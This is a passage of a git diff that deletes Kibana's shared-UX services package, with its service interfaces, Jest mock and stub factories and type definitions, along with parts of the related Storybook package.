b/packages/kbn-shared-ux-services/src/index.ts deleted file mode 100755 index 47f9d61ff88ac..0000000000000 --- a/packages/kbn-shared-ux-services/src/index.ts +++ /dev/null @@ -1,38 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export type { ServiceFactory, SharedUxServices, SharedUxServicesContext } from './types'; -export type { - MockServicesFactoryParams, - SharedUxApplicationService, - SharedUxDocLinksService, - SharedUxEditorsService, - SharedUxHttpService, - SharedUxPlatformService, - SharedUxUserPermissionsService, - SharedUxDataService, -} from './services'; - -export { - SharedUxServicesProvider, - useApplication, - useDocLinks, - useEditors, - useHttp, - usePermissions, - usePlatformService, - useData, - useSharedUxServices, -} from './context'; - -export { - mockServiceFactories, - mockServicesFactory, - stubServiceFactories, - stubServicesFactory, -} from './services'; diff --git a/packages/kbn-shared-ux-services/src/services/application.ts b/packages/kbn-shared-ux-services/src/services/application.ts deleted file mode 100644 index 89a7fa91fadc5..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/application.ts +++ /dev/null @@ -1,14 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { Observable } from 'rxjs'; - -export interface SharedUxApplicationService { - navigateToUrl: (url: string) => Promise | void; - currentAppId$: Observable; -} diff --git a/packages/kbn-shared-ux-services/src/services/data.ts b/packages/kbn-shared-ux-services/src/services/data.ts deleted file mode 100644 index 2750c9bd32085..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/data.ts +++ /dev/null @@ -1,19 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/** - * A service providing data information. Typically used for handling of empty state.. - */ -export interface SharedUxDataService { - /** True if the cluster contains data, false otherwise. */ - hasESData: () => Promise; - /** True if Kibana instance contains user-created data view, false otherwise. */ - hasUserDataView: () => Promise; - /** True if Kibana instance contains any data view, including system-created ones. */ - hasDataView: () => Promise; -} diff --git a/packages/kbn-shared-ux-services/src/services/doc_links.ts b/packages/kbn-shared-ux-services/src/services/doc_links.ts deleted file mode 100644 index 3b8eb4748d76f..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/doc_links.ts +++ /dev/null @@ -1,15 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/** - * A service providing links to documentation about various features in Kibana. - */ -export interface SharedUxDocLinksService { - /** A link to information about Data Views in Kibana */ - dataViewsDocLink: string; -} diff --git a/packages/kbn-shared-ux-services/src/services/editors.ts b/packages/kbn-shared-ux-services/src/services/editors.ts deleted file mode 100644 index 4dc5b7d9bc269..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/editors.ts +++ /dev/null @@ -1,36 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/** - * TODO: `DataView` is a class exported by `src/plugins/data_views/public`. Since this service - * is contained in this package-- and packages can only depend on other packages and never on - * plugins-- we have to set this to `unknown`. If and when `DataView` is exported from a - * stateless package, we can remove this. - * - * @see: https://github.com/elastic/kibana/issues/127695 - */ -type DataView = unknown; - -/** - * A subset of the `DataViewEditorOptions` interface relevant to our service and components. - * - * @see: src/plugins/data_view_editor/public/types.ts - */ -interface DataViewEditorOptions { - /** Handler to be invoked when the Data View Editor completes a save operation. */ - onSave: (dataView: DataView) => void; -} - -/** - * A service providing methods to invoke and interact with various editors provided - * in Kibana. - */ -export interface SharedUxEditorsService { - /** A method to open the Data View Editor flow. */ - openDataViewEditor: (options: DataViewEditorOptions) => () => void; -} diff --git a/packages/kbn-shared-ux-services/src/services/index.ts b/packages/kbn-shared-ux-services/src/services/index.ts deleted file mode 100644 index 0e4e4e473028d..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/index.ts +++ /dev/null @@ -1,21 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export type { SharedUxApplicationService } from './application'; -export type { SharedUxDocLinksService } from './doc_links'; -export type { SharedUxEditorsService } from './editors'; -export type { SharedUxHttpService } from './http'; -export type { SharedUxUserPermissionsService } from './permissions'; -export type { SharedUxPlatformService } from './platform'; -export type { SharedUxDataService } from './data'; -export type { MockServicesFactoryParams } from './mock'; - -// eslint-disable-next-line @kbn/imports/no_boundary_crossing -export { mockServicesFactory, mockServiceFactories } from './mock'; -// eslint-disable-next-line @kbn/imports/no_boundary_crossing -export { stubServicesFactory, stubServiceFactories } from './stub'; diff --git a/packages/kbn-shared-ux-services/src/services/mock/application.mock.ts b/packages/kbn-shared-ux-services/src/services/mock/application.mock.ts deleted file mode 100644 index 947113c4a3168..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/application.mock.ts +++ /dev/null @@ -1,23 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { Observable } from 'rxjs'; -import { ServiceFactory } from '../../types'; -import { SharedUxApplicationService } from '../application'; - -export type MockApplicationServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Jest-based implementation of `SharedUXApplicationService`. - */ -export const applicationServiceFactory: MockApplicationServiceFactory = () => ({ - navigateToUrl: () => Promise.resolve(), - currentAppId$: new Observable((subscriber) => { - subscriber.next('abc123'); - }), -}); diff --git a/packages/kbn-shared-ux-services/src/services/mock/data.mock.ts b/packages/kbn-shared-ux-services/src/services/mock/data.mock.ts deleted file mode 100644 index bb9d59643348d..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/data.mock.ts +++ /dev/null @@ -1,32 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { ServiceFactory } from '../../types'; -import { SharedUxDataService } from '../data'; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxDataService`. - */ -export type MockDataServiceFactory = ServiceFactory; - -export interface MockDataServiceFactoryConfig { - hasESData: boolean; - hasDataView: boolean; - hasUserDataView: boolean; -} - -/** - * A factory function for creating a Jest-based implementation of `SharedUxDataService`. - */ -export const dataServiceFactory: (config?: MockDataServiceFactoryConfig) => SharedUxDataService = ( - config?: MockDataServiceFactoryConfig -) => ({ - hasESData: () => Promise.resolve(config?.hasESData || false), - hasDataView: () => Promise.resolve(config?.hasDataView || false), - hasUserDataView: () => Promise.resolve(config?.hasUserDataView || false), -}); diff --git a/packages/kbn-shared-ux-services/src/services/mock/doc_links.mock.ts b/packages/kbn-shared-ux-services/src/services/mock/doc_links.mock.ts deleted file mode 100644 index 2ee0985d0a413..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/doc_links.mock.ts +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { ServiceFactory } from '../../types'; -import type { SharedUxDocLinksService } from '../doc_links'; - -/** - * A factory function for creating a Jest implementation of `SharedUxDocLinksService`. - */ -export type MockDocLinksServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxDocLinksService`. - */ -export const docLinksServiceFactory: MockDocLinksServiceFactory = () => ({ - dataViewsDocLink: 'dummy link', -}); diff --git a/packages/kbn-shared-ux-services/src/services/mock/editors.mock.ts b/packages/kbn-shared-ux-services/src/services/mock/editors.mock.ts deleted file mode 100644 index 80742f15d93cd..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/editors.mock.ts +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { ServiceFactory } from '../../types'; -import type { SharedUxEditorsService } from '../editors'; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxEditorsService`. - */ -export type MockEditorsServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxEditorsService`. - */ -export const editorsServiceFactory: MockEditorsServiceFactory = () => ({ - openDataViewEditor: jest.fn(), -}); diff --git a/packages/kbn-shared-ux-services/src/services/mock/http.mock.ts b/packages/kbn-shared-ux-services/src/services/mock/http.mock.ts deleted file mode 100644 index 0ef07526e5116..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/http.mock.ts +++ /dev/null @@ -1,19 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { ServiceFactory } from '../../types'; -import { SharedUxHttpService } from '../http'; - -export type MockHttpServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Jest-based implementation of `SharedUXHttpService`. - */ -export const httpServiceFactory: MockHttpServiceFactory = () => ({ - addBasePath: jest.fn((path: string) => (path ? path : 'path')), -}); diff --git a/packages/kbn-shared-ux-services/src/services/mock/index.ts b/packages/kbn-shared-ux-services/src/services/mock/index.ts deleted file mode 100644 index 604a8ae677b9d..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/index.ts +++ /dev/null @@ -1,64 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { SharedUxServices } from '../../types'; - -import { applicationServiceFactory } from './application.mock'; -import { docLinksServiceFactory } from './doc_links.mock'; -import { editorsServiceFactory } from './editors.mock'; -import { httpServiceFactory } from './http.mock'; -import { userPermissionsServiceFactory } from './permissions.mock'; -import { platformServiceFactory } from './platform.mock'; -import { dataServiceFactory, MockDataServiceFactoryConfig } from './data.mock'; - -export type { MockApplicationServiceFactory } from './application.mock'; -export type { MockDocLinksServiceFactory } from './doc_links.mock'; -export type { MockEditorsServiceFactory } from './editors.mock'; -export type { MockHttpServiceFactory } from './http.mock'; -export type { MockUserPermissionsServiceFactory } from './permissions.mock'; -export type { MockPlatformServiceFactory } from './platform.mock'; - -export { applicationServiceFactory } from './application.mock'; -export { docLinksServiceFactory } from './doc_links.mock'; -export { editorsServiceFactory } from './editors.mock'; -export { httpServiceFactory } from './http.mock'; -export { userPermissionsServiceFactory } from './permissions.mock'; -export { platformServiceFactory } from './platform.mock'; -export { dataServiceFactory } from './data.mock'; - -export interface MockServicesFactoryParams { - config: MockDataServiceFactoryConfig; -} - -/** - * A factory function for creating a Jest-based implementation of `SharedUxServices`. - */ -export const mockServicesFactory: (params?: MockServicesFactoryParams) => SharedUxServices = ( - params?: MockServicesFactoryParams -) => ({ - application: applicationServiceFactory(), - docLinks: docLinksServiceFactory(), - editors: editorsServiceFactory(), - http: httpServiceFactory(), - permissions: userPermissionsServiceFactory(), - platform: platformServiceFactory(), - data: dataServiceFactory(params?.config), -}); - -/** - * A collection of mock Service Factories. - */ -export const mockServiceFactories = { - applicationServiceFactory, - docLinksServiceFactory, - editorsServiceFactory, - httpServiceFactory, - platformServiceFactory, - userPermissionsServiceFactory, - dataServiceFactory, -}; diff --git a/packages/kbn-shared-ux-services/src/services/mock/permissions.mock.ts b/packages/kbn-shared-ux-services/src/services/mock/permissions.mock.ts deleted file mode 100644 index 3fb5e78a5b839..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/permissions.mock.ts +++ /dev/null @@ -1,23 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { ServiceFactory } from '../../types'; -import type { SharedUxUserPermissionsService } from '../permissions'; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxUserPermissionsService`. - */ -export type MockUserPermissionsServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxUserPermissionsService`. - */ -export const userPermissionsServiceFactory: MockUserPermissionsServiceFactory = () => ({ - canCreateNewDataView: true, - canAccessFleet: true, -}); diff --git a/packages/kbn-shared-ux-services/src/services/mock/platform.mock.ts b/packages/kbn-shared-ux-services/src/services/mock/platform.mock.ts deleted file mode 100644 index 8e6ec205d2856..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/mock/platform.mock.ts +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { ServiceFactory } from '../../types'; -import type { SharedUxPlatformService } from '../platform'; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxPlatformService`. - */ -export type MockPlatformServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Jest-based implementation of `SharedUxPlatformService`. - */ -export const platformServiceFactory: MockPlatformServiceFactory = () => ({ - setIsFullscreen: jest.fn(), -}); diff --git a/packages/kbn-shared-ux-services/src/services/permissions.ts b/packages/kbn-shared-ux-services/src/services/permissions.ts deleted file mode 100644 index d6fcabd8ccedf..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/permissions.ts +++ /dev/null @@ -1,16 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/** - * A service providing permissions information, typically for the current user. - */ -export interface SharedUxUserPermissionsService { - /** True if the user has permission to create a new Data View, false otherwise. */ - canCreateNewDataView: boolean; - canAccessFleet: boolean; -} diff --git a/packages/kbn-shared-ux-services/src/services/platform.ts b/packages/kbn-shared-ux-services/src/services/platform.ts deleted file mode 100644 index 83148abac8643..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/platform.ts +++ /dev/null @@ -1,24 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/** - * A service providing methods to interact with the platform in which this code is - * running, (almost always Kibana). - * - * Rather than provide the entire `CoreStart` contract to components, we provide simplified - * abstractions around a use case specific to Shared UX. This way, we know exactly how the - * `CoreStart` and other plugins are used. This makes mocking and refactoring easier when - * upstream dependencies change. - */ -export interface SharedUxPlatformService { - /** - * Sets the fullscreen state of the chrome. - * @param isFullscreen True if the chrome should be fullscreen, false otherwise. - */ - setIsFullscreen: (isFullscreen: boolean) => void; -} diff --git a/packages/kbn-shared-ux-services/src/services/stub/application.ts b/packages/kbn-shared-ux-services/src/services/stub/application.ts deleted file mode 100644 index 72c1f3db30089..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/stub/application.ts +++ /dev/null @@ -1,27 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { Observable } from 'rxjs'; -import { ServiceFactory } from '../../types'; -import { SharedUxApplicationService } from '../application'; - -export type ApplicationServiceFactory = ServiceFactory; - -/** - * A factory function for creating for creating a simple stubbed implementation of `SharedUXApplicationService`. - */ -export const applicationServiceFactory: ApplicationServiceFactory = () => ({ - navigateToUrl: (url) => { - // eslint-disable-next-line no-console - console.log(url); - return Promise.resolve(); - }, - currentAppId$: new Observable((subscriber) => { - subscriber.next('123'); - }), -}); diff --git a/packages/kbn-shared-ux-services/src/services/stub/data.ts b/packages/kbn-shared-ux-services/src/services/stub/data.ts deleted file mode 100644 index 833c64e1f9d8d..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/stub/data.ts +++ /dev/null @@ -1,24 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { ServiceFactory } from '../../types'; -import { SharedUxDataService } from '../data'; - -/** - * A factory function for creating a simple stubbed implementation of `SharedUxDataSevice`. - */ -export type DataServiceFactory = ServiceFactory; - -/** - * A factory function for creating a simple stubbed implementation of `SharedUxDataSevice`. - */ -export const dataServiceFactory: DataServiceFactory = () => ({ - hasESData: () => Promise.resolve(true), - hasDataView: () => Promise.resolve(false), - hasUserDataView: () => Promise.resolve(false), -}); diff --git a/packages/kbn-shared-ux-services/src/services/stub/doc_links.ts b/packages/kbn-shared-ux-services/src/services/stub/doc_links.ts deleted file mode 100644 index 9bcfd7db78cfa..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/stub/doc_links.ts +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { ServiceFactory } from '../../types'; -import type { SharedUxDocLinksService } from '../doc_links'; - -/** - * A factory function for creating a stubbed implementation of `SharedUxDocLinksService`. - */ -export type DocLinksServiceFactory = ServiceFactory; - -/** - * A factory function for creating a stubbed implementation of `SharedUxDocLinksService`. - */ -export const docLinksServiceFactory: DocLinksServiceFactory = () => ({ - dataViewsDocLink: 'docs', -}); diff --git a/packages/kbn-shared-ux-services/src/services/stub/editors.ts b/packages/kbn-shared-ux-services/src/services/stub/editors.ts deleted file mode 100644 index 545539d873941..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/stub/editors.ts +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { ServiceFactory } from '../../types'; -import type { SharedUxEditorsService } from '../editors'; - -/** - * A factory function for creating a simple stubbed implementation of `SharedUxEditorsService`. - */ -export type EditorsServiceFactory = ServiceFactory; - -/** - * A factory function for creating a simple stubbed implementation of `SharedUxEditorsService`. - */ -export const editorsServiceFactory: EditorsServiceFactory = () => ({ - openDataViewEditor: () => () => {}, -}); diff --git a/packages/kbn-shared-ux-services/src/services/stub/http.ts b/packages/kbn-shared-ux-services/src/services/stub/http.ts deleted file mode 100644 index 08dae62ecdb7f..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/stub/http.ts +++ /dev/null @@ -1,24 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { ServiceFactory } from '../../types'; -import { SharedUxHttpService } from '../http'; - -/** - * A factory function for creating a simple stubbed implementation of `SharedUXHttpService`. - */ -export type HttpServiceFactory = ServiceFactory; - -/** - * A factory function for creating a simple stubbed implementation of `SharedUXHttpService`. - */ -export const httpServiceFactory: HttpServiceFactory = () => ({ - addBasePath: (url: string) => { - return url; - }, -}); diff --git a/packages/kbn-shared-ux-services/src/services/stub/index.ts b/packages/kbn-shared-ux-services/src/services/stub/index.ts deleted file mode 100644 index ab8b0ca3f4d9c..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/stub/index.ts +++ /dev/null @@ -1,43 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { SharedUxServices, ServiceFactory } from '../../types'; - -import { applicationServiceFactory } from './application'; -import { docLinksServiceFactory } from './doc_links'; -import { editorsServiceFactory } from './editors'; -import { httpServiceFactory } from './http'; -import { platformServiceFactory } from './platform'; -import { userPermissionsServiceFactory } from './permissions'; -import { dataServiceFactory } from './data'; - -/** - * A factory function for creating simple stubbed implementations of all `SharedUxServices`. - */ -export const stubServicesFactory: ServiceFactory = () => ({ - application: applicationServiceFactory(), - docLinks: docLinksServiceFactory(), - editors: editorsServiceFactory(), - http: httpServiceFactory(), - permissions: userPermissionsServiceFactory(), - platform: platformServiceFactory(), - data: dataServiceFactory(), -}); - -/** - * A collection of stubbed service factories. - */ -export const stubServiceFactories = { - applicationServiceFactory, - docLinksServiceFactory, - editorsServiceFactory, - httpServiceFactory, - platformServiceFactory, - userPermissionsServiceFactory, - dataServiceFactory, -}; diff --git a/packages/kbn-shared-ux-services/src/services/stub/permissions.ts b/packages/kbn-shared-ux-services/src/services/stub/permissions.ts deleted file mode 100644 index e5588f818f82a..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/stub/permissions.ts +++ /dev/null @@ -1,23 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { ServiceFactory } from '../../types'; -import type { SharedUxUserPermissionsService } from '../permissions'; - -/** - * A factory function for creating a simple stubbed implementation of `SharedUxUserPermissionsService`. - */ -export type UserPermissionsServiceFactory = ServiceFactory; - -/** - * A factory function for creating a simple stubbed implementation of `SharedUxUserPermissionsService`. - */ -export const userPermissionsServiceFactory: UserPermissionsServiceFactory = () => ({ - canCreateNewDataView: true, - canAccessFleet: true, -}); diff --git a/packages/kbn-shared-ux-services/src/services/stub/platform.ts b/packages/kbn-shared-ux-services/src/services/stub/platform.ts deleted file mode 100644 index 2e31238347307..0000000000000 --- a/packages/kbn-shared-ux-services/src/services/stub/platform.ts +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { ServiceFactory } from '../../types'; -import type { SharedUxPlatformService } from '../platform'; - -/** - * A factory function for creating a simple stubbed implementation of `SharedUxPlatformService`. - */ -export type PlatformServiceFactory = ServiceFactory; - -/** - * A factory function for creating a simple stubbed implementation of `SharedUxPlatformService`. - */ -export const platformServiceFactory: PlatformServiceFactory = () => ({ - setIsFullscreen: (_isFullscreen) => {}, -}); diff --git a/packages/kbn-shared-ux-services/src/types.ts b/packages/kbn-shared-ux-services/src/types.ts deleted file mode 100755 index a0a4ec32c0e75..0000000000000 --- a/packages/kbn-shared-ux-services/src/types.ts +++ /dev/null @@ -1,52 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { FC } from 'react'; - -import { - SharedUxApplicationService, - SharedUxDataService, - SharedUxDocLinksService, - SharedUxEditorsService, - SharedUxHttpService, - SharedUxPlatformService, - SharedUxUserPermissionsService, -} from './services'; - -/** - * A collection of services utilized by SharedUX. This serves as a thin - * abstraction layer between services provided by Kibana and other plugins - * while allowing this plugin to be developed independently of those contracts. - * - * It also allows us to "swap out" differenct implementations of these services - * for different environments, (e.g. Jest, Storybook, etc.) - */ -export interface SharedUxServices { - application: SharedUxApplicationService; - docLinks: SharedUxDocLinksService; - editors: SharedUxEditorsService; - http: SharedUxHttpService; - permissions: SharedUxUserPermissionsService; - platform: SharedUxPlatformService; - data: SharedUxDataService; -} - -/** - * A type representing a component that provides the `SharedUxServices` through a - * React Context. - */ -export type SharedUxServicesContext = FC<{}>; - -/** - * A factory function for creating one or more services. - * - * The `S` generic determines the shape of the API being produced. - * The `Parameters` generic determines what parameters are expected to - * create the service. - */ -export type ServiceFactory = (params: Parameters) => S; diff --git a/packages/kbn-shared-ux-storybook/README.mdx b/packages/kbn-shared-ux-storybook/README.mdx deleted file mode 100644 index 11992e336e627..0000000000000 --- a/packages/kbn-shared-ux-storybook/README.mdx +++ /dev/null @@ -1,34 +0,0 @@ ---- -id: kibSharedUXStorybook -slug: /kibana-dev-docs/shared-ux/packages/kbn-shared-ux-storybook -title: Shared UX Storybook -description: The `@kbn/shared-ux-storybook` package provides Storybook assets for Shared UX and other teams. -date: 2022-03-11 -tags: ['kibana', 'dev', 'sharedUX'] ---- - -## About Shared UX Storybook - -This package provides the Storybook implementation of `@kbn/shared-ux-services` as well as the configuration for the Shared UX Storybook site. - -- `/src/services` The `@kbn/shared-ux-services` implementation. -- `src/config` The Storybook site configuration. - -## Storybook site - -Run `yarn storybook shared_ux` from `/kibana` to view the site. It pulls in `*.stories.tsx` from all Shared UX packages and plugins and combines them into a single configuration. - -## Decorator - -If you're writing stories for your own components that compose Shared UX components, you can use a pre-configured [Storybook Decorator](https://storybook.js.org/docs/react/writing-stories/decorators) in your Storybook configuration: - -```ts -// preview.ts - -import { addDecorator } from '@storybook/react'; -import { servicesDecorator } from '@kbn/shared-ux-storybook'; - -addDecorator(servicesDecorator); -``` - -This will not only expose parameters, but also wrap your story in a pre-wired `SharedUxServicesProvider`. \ No newline at end of file diff --git a/packages/kbn-shared-ux-storybook/src/config/preview.ts b/packages/kbn-shared-ux-storybook/src/config/preview.ts deleted file mode 100644 index 194a16474af2c..0000000000000 --- a/packages/kbn-shared-ux-storybook/src/config/preview.ts +++ /dev/null @@ -1,12 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { addDecorator } from '@storybook/react'; -import { servicesDecorator } from '../decorators'; - -addDecorator(servicesDecorator); diff --git a/packages/kbn-shared-ux-storybook/src/decorators.tsx b/packages/kbn-shared-ux-storybook/src/decorators.tsx deleted file mode 100644 index cae87a15b54dd..0000000000000 --- a/packages/kbn-shared-ux-storybook/src/decorators.tsx +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { DecoratorFn } from '@storybook/react'; - -import { SharedUxServicesProvider } from '@kbn/shared-ux-services'; - -import { servicesFactory } from './services'; - -/** - * A Storybook decorator that provides the Shared UX `ServicesProvider` with Storybook-specific - * implementations to stories. - */ -export const servicesDecorator: DecoratorFn = (storyFn) => ( - {storyFn()} -); diff --git a/packages/kbn-shared-ux-storybook/src/index.ts b/packages/kbn-shared-ux-storybook/src/index.ts deleted file mode 100755 index 6b310673eb00d..0000000000000 --- a/packages/kbn-shared-ux-storybook/src/index.ts +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export { servicesDecorator } from './decorators'; - -export { - applicationServiceFactory, - 